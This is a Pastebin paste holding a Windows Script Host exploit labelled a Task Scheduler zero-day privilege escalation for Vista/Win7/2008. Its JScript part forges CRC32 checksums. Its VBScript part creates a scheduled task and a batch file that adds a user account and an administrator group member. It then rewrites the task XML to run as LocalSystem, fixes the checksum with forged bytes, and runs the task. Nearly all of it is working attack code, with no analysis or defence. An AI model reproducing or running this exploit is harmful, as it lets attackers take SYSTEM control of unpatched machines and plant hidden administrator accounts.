daily pastebin goal
96%
SHARE
TWEET

Djdj

a guest Mar 19th, 2019 87 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <job id="tasksch-wD-0day">
  2. <script language="Javascript">
  3.  
  4. crc_table = new Array(
  5.   0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,
  6.   0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,
  7.   0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,
  8.   0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE,
  9.   0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856,
  10.   0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
  11.   0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4,
  12.   0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
  13.   0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3,
  14.   0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A,
  15.   0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599,
  16.   0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
  17.   0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190,
  18.   0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F,
  19.   0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E,
  20.   0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
  21.   0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED,
  22.   0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
  23.   0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3,
  24.   0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2,
  25.   0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A,
  26.   0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5,
  27.   0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010,
  28.   0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
  29.   0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17,
  30.   0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6,
  31.   0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615,
  32.   0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8,
  33.   0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344,
  34.   0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
  35.   0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A,
  36.   0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5,
  37.   0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1,
  38.   0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C,
  39.   0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF,
  40.   0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
  41.   0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE,
  42.   0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31,
  43.   0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C,
  44.   0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713,
  45.   0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B,
  46.   0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
  47.   0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1,
  48.   0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C,
  49.   0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278,
  50.   0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7,
  51.   0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66,
  52.   0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
  53.   0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605,
  54.   0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8,
  55.   0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B,
  56.   0x2D02EF8D
  57. );
  58.  
  59. var hD='0123456789ABCDEF';
  60.  
  61. function dec2hex(d) {
  62. h='';
  63. for (i=0;i<8;i++) {
  64. h = hD.charAt(d&15)+h;
  65. d >>>= 4;
  66. }
  67. return h;
  68. }
  69. function encodeToHex(str){
  70.     var r="";
  71.     var e=str.length;
  72.     var c=0;
  73.     var h;
  74.     while(c<e){
  75.         h=str.charCodeAt(c++).toString(16);
  76.         while(h.length<3) h="0"+h;
  77.         r+=h;
  78.     }
  79.     return r;
  80. }
  81. function decodeFromHex(str){
  82.     var r="";
  83.     var e=str.length;
  84.     var s=0;
  85.     while(e>1){
  86.        
  87.         r=r+String.fromCharCode("0x"+str.substring(s,s+2));
  88.        
  89.         s=s+2;
  90.         e=e-2;
  91.     }
  92.    
  93.     return r;
  94.    
  95. }
  96.  
  97.  
  98. function calc_crc(anyForm) {
  99.  
  100. anyTextString=decodeFromHex(anyForm);
  101.  
  102. Crc_value = 0xFFFFFFFF;
  103. StringLength=anyTextString.length;
  104. for (i=0; i<StringLength; i++) {
  105. tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
  106. Table_value = crc_table[tableIndex];
  107. Crc_value >>>= 8;
  108. Crc_value ^= Table_value;
  109. }
  110. Crc_value ^= 0xFFFFFFFF;
  111. return dec2hex(Crc_value);
  112.  
  113. }
  114.  
  115. function rev_crc(leadString,endString,crc32) {
  116. //
  117. // First, we calculate the CRC-32 for the initial string
  118. //
  119.     anyTextString=decodeFromHex(leadString);
  120.    
  121.    Crc_value = 0xFFFFFFFF;
  122.    StringLength=anyTextString.length;
  123.    //document.write(alert(StringLength));
  124.    for (var i=0; i<StringLength; i++) {
  125.       tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF;
  126.       Table_value = crc_table[tableIndex];
  127.       Crc_value >>>= 8;
  128.       Crc_value ^= Table_value;
  129.    }
  130. //
  131. // Second, we calculate the CRC-32 without the final string
  132. //
  133.    crc=parseInt(crc32,16);
  134.    crc ^= 0xFFFFFFFF;
  135.    anyTextString=decodeFromHex(endString);
  136.    StringLength=anyTextString.length;
  137.    for (var i=0; i<StringLength; i++) {
  138.       tableIndex=0;
  139.       Table_value = crc_table[tableIndex];
  140.       while (((Table_value ^ crc) >>> 24)  & 0xFF) {
  141.          tableIndex++;
  142.          Table_value = crc_table[tableIndex];
  143.       }
  144.       crc ^= Table_value;
  145.       crc <<= 8;
  146.       crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1);
  147.    }
  148. //
  149. // Now let's find the 4-byte string
  150. //
  151.    for (var i=0; i<4; i++) {
  152.       tableIndex=0;
  153.       Table_value = crc_table[tableIndex];
  154.       while (((Table_value ^ crc) >>> 24)  & 0xFF) {
  155.          tableIndex++;
  156.          Table_value = crc_table[tableIndex];
  157.       }
  158.       crc ^= Table_value;
  159.       crc <<= 8;
  160.       crc |= tableIndex;
  161.    }
  162.    crc ^= Crc_value;
  163. //
  164. // Finally, display the results
  165. //
  166.    var TextString=dec2hex(crc);
  167.    var Teststring='';
  168. Teststring=TextString.substring(6,8);
  169. Teststring+=TextString.substring(4,6);
  170. Teststring+=TextString.substring(2,4);
  171. Teststring+=TextString.substring(0,2);
  172.    return Teststring
  173. }
  174. function decodeFromHex(str){
  175.     var r="";
  176.     var e=str.length;
  177.     var s=0;
  178.     while(e>1){
  179.        
  180.         r=r+String.fromCharCode("0x"+str.substring(s,s+2));
  181.        
  182.         s=s+2;
  183.         e=e-2;
  184.     }
  185.    
  186.     return r;
  187.    
  188. }
  189. </script>
  190.  
  191.  
  192.  
  193. <script language="VBScript">
  194. dim output
  195. set output = wscript.stdout
  196. output.writeline " Task Scheduler 0 day - Privilege Escalation "
  197. output.writeline " Should work on Vista/Win7/2008 x86/x64"
  198. output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf
  199. biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat"
  200. Set objShell = CreateObject("WScript.Shell")
  201. objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True
  202.  
  203. Set fso = CreateObject("Scripting.FileSystemObject")
  204. Set a = fso.CreateTextFile(biatchFile, True)
  205. a.WriteLine ("net user /add test123 test123")
  206. a.WriteLine ("net localgroup administrators /add v4l")
  207. a.WriteLine ("schtasks /delete /f /TN wDw00t")
  208.  
  209. Function ReadByteArray(strFileName)
  210. Const adTypeBinary = 1
  211. Dim bin
  212.     Set bin = CreateObject("ADODB.Stream")
  213.     bin.Type = adTypeBinary
  214.     bin.Open
  215.     bin.LoadFromFile strFileName
  216.     ReadByteArray = bin.Read
  217. 'output.writeline ReadByteArray
  218. End Function
  219.  
  220. Function OctetToHexStr (arrbytOctet)
  221.  Dim k
  222.  OctetToHexStr = ""
  223.  For k = 3 To Lenb (arrbytOctet)
  224.   OctetToHexStr = OctetToHexStr _
  225.         & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2)
  226.  Next
  227.  End Function
  228. strFileName="C:\windows\system32\tasks\wDw00t"
  229.  
  230. hexXML = OctetToHexStr (ReadByteArray(strFileName))
  231. 'output.writeline hexXML
  232. crc32 = calc_crc(hexXML)
  233. output.writeline "Crc32 Original: "+crc32
  234.  
  235.  
  236. Set xmlDoc = CreateObject("Microsoft.XMLDOM")
  237. 'permissions workaround
  238. 'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True
  239. 'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True
  240. Set objShell = WScript.CreateObject("WScript.Shell")
  241. Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t")
  242.  
  243. Do Until objExecObject.StdOut.AtEndOfStream
  244.  strLine = strLine & objExecObject.StdOut.ReadLine()
  245. Loop
  246. hexXML = "FFFE3C00"+OctetToHexStr(strLine)
  247. 'output.writeline hexXML
  248. Set ts = fso.createtextfile ("wDw00t.xml")
  249. For n = 1 To (Len (hexXML) - 1) step 2
  250.  ts.write Chr ("&h" & Mid (hexXML, n, 2))
  251. Next
  252. ts.close
  253.  
  254. xmlDoc.load "wDw00t.xml"
  255. Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author")
  256. Author.text = "LocalSystem"
  257. Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId")
  258. UserId.text = "S-1-5-18"
  259. xmldoc.save(strFileName)
  260.  
  261. hexXML = OctetToHexStr (ReadByteArray(strFileName))
  262.  
  263. leadString=hexXML+"3C0021002D002D00"
  264. endString="2D002D003E00"
  265. 'output.writeline leadString
  266. impbytes=rev_crc(leadString,endString,crc32)
  267. output.writeline "Crc32 Magic Bytes: "+impbytes
  268.  
  269. finalString = leadString+impbytes+endString
  270. forge = calc_crc(finalString)
  271. output.writeline "Crc32 Forged: "+forge
  272.  
  273. strHexString="FFFE"+finalString
  274. Set fso = CreateObject ("scripting.filesystemobject")
  275. Set stream = CreateObject ("adodb.stream")
  276.  
  277. Set ts = fso.createtextfile (strFileName)
  278.  
  279. For n = 1 To (Len (strHexString) - 1) step 2
  280.  ts.write Chr ("&h" & Mid (strHexString, n, 2))
  281. Next
  282. ts.close
  283.  
  284.  
  285. Set objShell = CreateObject("WScript.Shell")
  286. objShell.Run "schtasks /change /TN wDw00t /disable",,True
  287. objShell.Run "schtasks /change /TN wDw00t /enable",,True
  288. objShell.Run "schtasks /run /TN wDw00t",,True
  289.  
  290. </script>
  291. </job>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top